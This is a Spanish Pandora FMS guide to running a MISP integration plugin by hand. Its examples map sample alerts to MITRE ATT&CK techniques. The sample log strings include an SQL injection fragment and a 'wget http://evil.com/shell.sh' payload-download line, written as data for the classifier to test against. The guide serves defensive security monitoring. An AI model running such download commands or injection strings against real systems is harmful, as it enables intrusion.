# Ejecución Manual

Antes de dejar la integración funcionando en automático, es altamente recomendable realizar pruebas manuales desde la terminal del servidor de Pandora FMS. Esto nos permite verificar la conectividad con MISP y comprobar cómo el motor de auto-clasificación (Triaje) analiza los logs en crudo para asignar el nivel de amenaza y las tácticas de MITRE ATT&amp;CK.

A continuación, se presentan **6 ejemplos de ejecución** basados en diferentes vectores de ataque, más un **ejemplo avanzado** usando todos los parámetros opcionales.

<p class="callout info">Recuerda sustituir `https://misp.midominio.com` y `TU_API_KEY` por los datos reales de tu entorno antes de ejecutar los comandos.</p>

#### 1. Explotación de Aplicación Pública (MITRE T1190)

El script detecta intentos de inyección SQL o XSS.

```bash
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
  -u "https://misp.midominio.com" -k "TU_API_KEY" \
  -a "Web_Server_Apache" -n "Intento de SQL Injection" \
  -d "Detectado ataque: select * from users en login.php desde la IP 192.168.1.100"
```

---

<div _ngcontent-ng-c937651176="" class="code-block ng-tns-c937651176-171 ng-animate-disabled ng-trigger ng-trigger-codeBlockRevealAnimation" id="bkmrk--1" jslog="223238;track:impression,attention;BardVeMetadataKey:[["r_562ed9003745dd57","c_b189c74db9e79413",null,"rc_97629155ed7f14d2",null,null,"es",null,1,null,null,1,0]]"><div _ngcontent-ng-c937651176="" class="formatted-code-block-internal-container ng-tns-c937651176-171"><div _ngcontent-ng-c937651176="" class="animated-opacity ng-tns-c937651176-171"></div></div></div>#### 2. Transferencia de Herramientas Maliciosas (MITRE T1105)

El script detecta comandos de descarga sospechosos en la terminal.

```bash
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
  -u "https://misp.midominio.com" -k "TU_API_KEY" \
  -a "Linux_App_Server" -n "Descarga de Payload" \
  -d "Ejecucion sospechosa: wget http://evil.com/shell.sh iniciada por 10.0.0.50"
```

---

<div _ngcontent-ng-c937651176="" class="code-block ng-tns-c937651176-172 ng-animate-disabled ng-trigger ng-trigger-codeBlockRevealAnimation" id="bkmrk--4" jslog="223238;track:impression,attention;BardVeMetadataKey:[["r_562ed9003745dd57","c_b189c74db9e79413",null,"rc_97629155ed7f14d2",null,null,"es",null,1,null,null,1,0]]"><div _ngcontent-ng-c937651176="" class="formatted-code-block-internal-container ng-tns-c937651176-172"><div _ngcontent-ng-c937651176="" class="animated-opacity ng-tns-c937651176-172"></div></div></div>#### 3. Ejecución por Usuario / Malware (MITRE T1204)

El script detecta alertas de antivirus o cuarentenas.

```bash
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
  -u "https://misp.midominio.com" -k "TU_API_KEY" \
  -a "Windows_Endpoint_01" -n "Infección de Malware" \
  -d "Antivirus alert: malware trojan quarantined. Origen de descarga: 198.51.100.44"
```

---

<div _ngcontent-ng-c937651176="" class="code-block ng-tns-c937651176-173 ng-animate-disabled ng-trigger ng-trigger-codeBlockRevealAnimation" id="bkmrk--7" jslog="223238;track:impression,attention;BardVeMetadataKey:[["r_562ed9003745dd57","c_b189c74db9e79413",null,"rc_97629155ed7f14d2",null,null,"es",null,1,null,null,1,0]]"><div _ngcontent-ng-c937651176="" class="formatted-code-block-internal-container ng-tns-c937651176-173"><div _ngcontent-ng-c937651176="" class="animated-opacity ng-tns-c937651176-173"></div></div></div>#### 4. Uso de Cuentas Válidas / Viaje Imposible (MITRE T1078)

El script detecta anomalías en los inicios de sesión.

```bash
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
  -u "https://misp.midominio.com" -k "TU_API_KEY" \
  -a "VPN_Gateway" -n "Viaje Imposible Detectado" \
  -d "Alerta de seguridad: impossible travel VPN login from malicious IP 203.0.113.42"
```

---

<div _ngcontent-ng-c937651176="" class="code-block ng-tns-c937651176-174 ng-animate-disabled ng-trigger ng-trigger-codeBlockRevealAnimation" id="bkmrk--10" jslog="223238;track:impression,attention;BardVeMetadataKey:[["r_562ed9003745dd57","c_b189c74db9e79413",null,"rc_97629155ed7f14d2",null,null,"es",null,1,null,null,1,0]]"><div _ngcontent-ng-c937651176="" class="formatted-code-block-internal-container ng-tns-c937651176-174"><div _ngcontent-ng-c937651176="" class="animated-opacity ng-tns-c937651176-174"></div></div></div>#### 5. Phishing / Spearphishing (MITRE T1566)

El script clasifica ataques recibidos por correo electrónico.

```bash
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
  -u "https://misp.midominio.com" -k "TU_API_KEY" \
  -a "Mail_Exchange" -n "Correo Malicioso" \
  -d "Filtro de correo: malicious attachment bloqueado del remitente con IP 203.0.113.99"
```

---

<div _ngcontent-ng-c937651176="" class="code-block ng-tns-c937651176-175 ng-animate-disabled ng-trigger ng-trigger-codeBlockRevealAnimation" id="bkmrk--13" jslog="223238;track:impression,attention;BardVeMetadataKey:[["r_562ed9003745dd57","c_b189c74db9e79413",null,"rc_97629155ed7f14d2",null,null,"es",null,1,null,null,1,0]]"><div _ngcontent-ng-c937651176="" class="formatted-code-block-internal-container ng-tns-c937651176-175"><div _ngcontent-ng-c937651176="" class="animated-opacity ng-tns-c937651176-175"></div></div></div>#### 6. Fuerza Bruta (MITRE T1110)

El script detecta intentos repetidos de autenticación fallida.

```bash
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
  -u "https://misp.midominio.com" -k "TU_API_KEY" \
  -a "SSH_Server" -n "Ataque de Fuerza Bruta" \
  -d "Raw log: Failed password for root from 192.168.1.200 port 22 ssh2"
```

<div _ngcontent-ng-c937651176="" class="code-block ng-tns-c937651176-176 ng-animate-disabled ng-trigger ng-trigger-codeBlockRevealAnimation" id="bkmrk--16" jslog="223238;track:impression,attention;BardVeMetadataKey:[["r_562ed9003745dd57","c_b189c74db9e79413",null,"rc_97629155ed7f14d2",null,null,"es",null,1,null,null,1,0]]"><div _ngcontent-ng-c937651176="" class="formatted-code-block-internal-container ng-tns-c937651176-176"><div _ngcontent-ng-c937651176="" class="animated-opacity ng-tns-c937651176-176"></div></div></div>---

#### 7. Ejecución Avanzada (Sobrescribir Triaje)

Si prefieres ignorar la clasificación automática del script y forzar tus propios valores, puedes usar los parámetros opcionales. En este ejemplo, forzaremos el nivel TLP a rojo, el nivel de amenaza a Crítico (1), compartiremos con la comunidad (1), asignaremos la categoría manualmente y añadiremos dos etiquetas personalizadas.

```bash
python3 /usr/share/pandora_server/util/plugin/pandora_to_misp.py \
  -u "https://misp.midominio.com" -k "TU_API_KEY" \
  -a "Main_Firewall" -n "Ataque Crítico Personalizado" \
  -d "Alerta custom: denegación de servicio desde 10.10.10.10" \
  -t "tlp:red" \
  -s 1 \
  -l 1 \
  -c "Network activity" \
  -g "SOC-Team, Critical-Alert, misp-galaxy:mitre-attack-pattern=\"Network Denial of Service - T1498\""
```

<div _ngcontent-ng-c937651176="" class="code-block ng-tns-c937651176-177 ng-animate-disabled ng-trigger ng-trigger-codeBlockRevealAnimation" id="bkmrk--20" jslog="223238;track:impression,attention;BardVeMetadataKey:[["r_562ed9003745dd57","c_b189c74db9e79413",null,"rc_97629155ed7f14d2",null,null,"es",null,1,null,null,1,0]]"><div _ngcontent-ng-c937651176="" class="formatted-code-block-internal-container ng-tns-c937651176-177"><div _ngcontent-ng-c937651176="" class="animated-opacity ng-tns-c937651176-177"></div></div></div>---

#### 8. Verificación

Tras ejecutar cualquiera de estos comandos, el script devolverá un `1` (éxito) o un `0` (error) en la consola. Para comprobar los detalles, revisa el archivo de registro del plugin:

```bash
tail -f /var/log/pandora/pandora_misp_integration.log
```

<div _ngcontent-ng-c937651176="" class="code-block ng-tns-c937651176-178 ng-animate-disabled ng-trigger ng-trigger-codeBlockRevealAnimation" id="bkmrk--23" jslog="223238;track:impression,attention;BardVeMetadataKey:[["r_562ed9003745dd57","c_b189c74db9e79413",null,"rc_97629155ed7f14d2",null,null,"es",null,1,null,null,1,0]]"><div _ngcontent-ng-c937651176="" class="formatted-code-block-internal-container ng-tns-c937651176-178"><div _ngcontent-ng-c937651176="" class="animated-opacity ng-tns-c937651176-178"></div></div></div>[![image.png](https://pandorafms.com/guides/public/uploads/images/gallery/2026-03/scaled-1680-/ePQimage.png)](https://pandorafms.com/guides/public/uploads/images/gallery/2026-03/ePQimage.png)

Finalmente, accede a tu consola web de MISP y verás el evento recién creado con su IP extraída y las etiquetas MITRE correspondientes.